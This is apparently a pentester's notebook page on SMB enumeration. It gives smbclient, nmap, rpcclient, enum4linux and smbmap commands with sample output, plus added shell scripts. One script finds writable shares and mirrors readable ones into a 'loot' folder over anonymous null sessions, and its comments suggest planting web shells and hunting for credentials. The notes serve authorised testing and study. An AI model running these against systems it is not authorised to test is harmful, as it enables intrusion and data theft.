refabr1k's Pentest Notebook
445 tcp - SMB


SMBClient

# list shares (-L). It prompts for a password; an empty password usually falls back to a guest/anonymous session (use -N to skip the prompt)
smbclient -L //192.168.1.5

Enter WORKGROUP\root's password:

#         Sharename       Type      Comment
#         ---------       ----      -------
#         IPC$            IPC       Remote IPC
#         share           Disk
#         wwwroot         Disk
#         ADMIN$          Disk      Remote Admin
#         C$              Disk      Default share
# Reconnecting with SMB1 for workgroup listing.
#         Server               Comment
#         ---------            -------
#         Workgroup            Master
#         ---------            -------
# IPC$, ADMIN$ and C$ are default shares; the custom ones (share, wwwroot) are where to look first

NMBLookup

# NetBIOS node status query: dumps the host's NetBIOS name table
nmblookup -A 192.168.0.5

# Looking up status of [ip]
#         [hostname]      <00> -         M <ACTIVE>
#         [hostname]      <20> -         M <ACTIVE>
#         WORKGROUP       <00> - <GROUP> M <ACTIVE>
#         WORKGROUP       <1e> - <GROUP> M <ACTIVE>
#                         <03> -         M <ACTIVE>
#         INet~Services   <1c> - <GROUP> M <ACTIVE>
#         IS~[hostname]   <00> -         M <ACTIVE>
# MAC Address = 00-50-56-XX-XX-XX
#
# reading the suffixes:
#   <00> unique  = workstation service (the hostname);  <00> group = workgroup/domain name
#   <20>         = file server service, i.e. the host offers SMB shares
#   <03>         = messenger service
#   <1e> group   = browser service elections
#   <1c> group   = on a domain name this lists the domain controllers;
#                  INet~Services<1c> together with IS~hostname<00> means IIS is installed
#   00-50-56     = VMware OUI, so the target is a VM

SMBClient (SMB1 / null session)

# force SMB1 (NT1) for old targets; modern smbclient refuses NT1 by default (client min protocol is SMB2)
smbclient -L //10.10.10.10 --option='client min protocol=NT1' -U administrator

# no password (null session): -N suppresses the password prompt
smbclient -L //10.10.10.10 -N

Nmap Scan

# sweep a range for SMB ports; grepable output (-oG) for later scripts
nmap -v -p 139,445 -oG smb.txt  10.11.24.1-100

# smb enum script: needs a null session or creds (--script-args smbusername=...,smbpassword=...)
nmap -p 139,445 --script smb-enum-users <ipaddress_here>

# OS, hostname, domain and SMB dialect of the target
nmap -v -p 139,445 --script smb-os-discovery 10.11.24.85

# SMB vulnerability checks (ms08-067, ms17-010, ...); plain --script vuln runs every vuln-category script, not just SMB
nmap -v -p 139,445 --script "smb-vuln*" <ipaddress_here>
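
As an added example (not part of the original notebook), the script below reads the grepable smb.txt written by the sweep above, keeps only the hosts that actually have 445 open, and feeds them to the NSE SMB scripts. The nmap -oG output embedded in it is constructed; the port-entry format it parses (port/state/proto/owner/service/rpcinfo/version) is nmap's documented grepable layout.

```shell
#!/bin/sh
# Added example: pick SMB targets out of nmap's grepable (-oG) output.
# Assumes the file was produced by `nmap -v -p 139,445 -oG smb.txt <range>`.

# hosts_with_port PORT   (nmap -oG text on stdin, one IP per line on stdout)
# A grepable "Ports:" line looks like:
#   Host: 10.11.24.5 ()   Ports: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///
# Each entry is port/state/proto/owner/service/rpcinfo/version, so the first
# two "/"-separated fields are all that matters here.
hosts_with_port() {
    awk -v want="$1" '
        /^Host:/ && /Ports:/ {
            ip = $2
            split($0, half, "Ports: ")
            n = split(half[2], entries, ", ")
            for (i = 1; i <= n; i++) {
                split(entries[i], f, "/")
                if (f[1] == want && f[2] == "open") { print ip; break }
            }
        }'
}

# Constructed sample of what smb.txt contains after the sweep above.
SAMPLE_GNMAP='# Nmap 7.91 scan initiated as: nmap -v -p 139,445 -oG smb.txt 10.11.24.1-100
Host: 10.11.24.5 ()   Status: Up
Host: 10.11.24.5 ()   Ports: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///   Ignored State: closed (0)
Host: 10.11.24.9 ()   Status: Up
Host: 10.11.24.9 ()   Ports: 139/open/tcp//netbios-ssn///, 445/filtered/tcp//microsoft-ds///
Host: 10.11.24.85 ()  Status: Up
Host: 10.11.24.85 ()  Ports: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///
# Nmap done -- 100 IP addresses (3 hosts up) scanned'

# Usage: ./smb-targets.sh smb.txt
# Writes smb-targets.txt and runs the OS/share scripts only against hosts that answered on 445.
if [ -n "${1:-}" ]; then
    hosts_with_port 445 < "$1" > smb-targets.txt
    nmap -v -p 139,445 --script smb-os-discovery,smb-enum-shares -iL smb-targets.txt
fi
```

Run it without arguments and nothing touches the network; the parser is the reusable part, so `hosts_with_port 139` on the same file gives the NetBIOS-only hosts (10.11.24.9 above), which are worth a nbtscan rather than being skipped.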

NBTScan

nbtscan -r 10.11.24.0/24

RPCClient

Null sessions: the default SMB configuration on Windows NT/2000/XP allows anonymous (null) sessions to IPC$, which expose users, groups, shares and the password policy without credentials. From Windows 2003 and XP SP2 onwards this is disabled by default, but it still turns up on misconfigured hosts and on Samba, so always test for it. Use rpcclient to explore what a null session gives you.

# anonymous bind: empty user, -N so it does not prompt for a password. If refused, retry with creds: -U 'user%pass'
rpcclient -U "" -N 192.168.1.200

# server info such as OS version, server type
srvinfo

# domain users with their RIDs (RID 500 is the built-in Administrator even if renamed)
enumdomusers

# show password policy (min length, lockout threshold: check this before brute forcing)
getdompwinfo

# domain info
querydominfo

# list shares (SRVSVC)
netshareenum

Enum4Linux

# -a: all simple enumeration (users, groups, shares, password policy, OS); -v: verbose
enum4linux -a -v 192.168.1.200

SMBMap

# list shares and what the current (here: null) session may do with them
smbmap -H 192.168.1.5

 [+] Finding open SMB ports....
 [+] User SMB session established on [ip]...
 [+] IP: [ip]:445        Name: [ip]                                     
         Disk                                                    Permissions
         ----                                                    -----------
         ADMIN$                                                  NO ACCESS
         C$                                                      NO ACCESS
         IPC$                                                    NO ACCESS
         NETLOGON                                                NO ACCESS
         Replication                                             READ ONLY
         SYSVOL                                                  NO ACCESS
# anything other than NO ACCESS is a lead: READ ONLY shares get mirrored and searched, READ, WRITE shares can be used to plant files
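
As an added example (not from the original notebook), the script below parses the smbmap permission table shown above, separates the readable shares from the writable ones, and mirrors the readable shares with smbclient over the same null session. It assumes smbmap and smbclient are on PATH; the smbmap output embedded in it is constructed (the page's listing plus one writable share).

```shell
#!/bin/sh
# Added example: act on `smbmap -H` output.
# smbmap prints its permission as two words (NO ACCESS, READ ONLY, WRITE ONLY,
# READ, WRITE), so $2 and $3 are the permission and anything after is the
# optional Comment column of newer versions. Share names with spaces would
# break the column split, since smbmap does not quote them.

# stdin: smbmap output; stdout: "<share>\t<permission>" for every share that is not NO ACCESS
accessible_shares() {
    awk '
        /^[[:space:]]*Disk[[:space:]]+Permissions/ { in_table = 1; next }
        /^[[:space:]]*----/                        { next }
        /^[[:space:]]*$/ || /^[[:space:]]*\[/      { in_table = 0 }   # blank line or next [+] block ends the table
        in_table && NF >= 3 {
            perm = $2 " " $3
            if (perm != "NO ACCESS") print $1 "\t" perm
        }'
}

# Writable shares are the interesting ones: drop a file, overwrite a script,
# or, on a web root, plant a web shell.
writable_shares() {
    accessible_shares | awk -F '\t' '$2 ~ /WRITE/ { print $1 }'
}

# Mirror one share into loot/<host>/<share> over a null session (-N).
pull_share() {
    host="$1"; share="$2"
    mkdir -p "loot/$host/$share"
    ( cd "loot/$host/$share" && smbclient "//$host/$share" -N -c 'recurse ON; prompt OFF; mget *' )
}

# Constructed sample: the listing above plus a writable web root.
SAMPLE_SMBMAP='[+] Finding open SMB ports....
[+] User SMB session established on 192.168.1.5...
[+] IP: 192.168.1.5:445        Name: 192.168.1.5
        Disk                                                    Permissions
        ----                                                    -----------
        ADMIN$                                                  NO ACCESS
        C$                                                      NO ACCESS
        IPC$                                                    NO ACCESS
        NETLOGON                                                NO ACCESS
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS
        wwwroot                                                 READ, WRITE
'

# Usage: ./smb-loot.sh 192.168.1.5
if [ -n "${1:-}" ]; then
    smbmap -H "$1" | tee "$1.smbmap.txt"
    accessible_shares < "$1.smbmap.txt"
    printf 'writable: %s\n' "$(writable_shares < "$1.smbmap.txt" | tr '\n' ' ')"
    accessible_shares < "$1.smbmap.txt" | cut -f1 | while read -r share; do pull_share "$1" "$share"; done
fi
```

On the constructed sample this yields Replication (READ ONLY) and wwwroot (READ, WRITE), with wwwroot flagged as writable; the loot directory is then grep material (config files, scripts with embedded credentials, GPO files under Replication/SYSVOL).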

references:

https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html#nmblookup
http://www.madirish.net/59